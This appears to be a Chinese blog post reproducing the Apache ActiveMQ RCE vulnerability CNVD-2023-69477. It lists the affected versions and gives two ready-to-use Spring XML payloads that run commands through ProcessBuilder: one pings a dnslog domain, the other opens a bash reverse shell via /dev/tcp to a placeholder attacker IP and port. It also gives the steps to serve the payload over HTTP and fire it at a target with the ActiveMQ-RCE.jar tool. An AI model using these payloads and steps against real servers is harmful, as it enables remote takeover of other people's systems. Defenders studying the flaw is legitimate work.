Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

1、漏洞版本

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

2、POC

通过dnslog验证的poc.xml

<?xml version="1.0" encoding="utf-8"?>
 
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> 
    <constructor-arg> 
      <list> 
        <value>ping</value>    
        <value>ne5q0v.dnslog.cn</value> 
      </list> 
    </constructor-arg> 
  </bean> 
</beans>

反弹shell的poc.xml

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i >& /dev/tcp/ip/端口 0>&1]]></value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

3、复现过程

1、在本地含有poc.xml的文件夹下开启http服务

python -m http.server                  #默认端口为8000

可以正常访问即为开启成功

在这里插入图片描述

2、通过ActiveMQ-RCE.jar工具进行漏洞验证

java -jar ActiveMQ-RCE.jar tcp://目标ip:目标端口 http://开启http服务的ip:8000/poc.xml

3、命令执行成功,且在dnslog 平台收到dns请求记录
在这里插入图片描述

4、工具地址

ActiveMQ-RCE.jar

在这里插入图片描述

结束语:来自某吧的诗句

很多人看不到未来,其实是看到了未来
咖啡因来自咖啡果
苦难是生命的防沉迷系统

# apache # activemq # web安全
Logo
云原生开发者技术专区邀请您加入

一起探索未来云端世界的核心,云原生技术专区带您领略创新、高效和可扩展的云计算解决方案,引领您在数字化时代的成功之路。

更多推荐

cover

猫头虎分享:鸿蒙生态带给开发者的全新机遇!轻松实现按需加载与多端适配,开发效率翻倍

avatar 云原生技术专区
cover

Windows安装Mysql8.4,看这一篇就够了(超级详细!)

avatar 云原生技术专区
cover

猫头虎分享Python 编码转换库:处理 JSONL 编码格式转换的最佳实践

avatar 云原生技术专区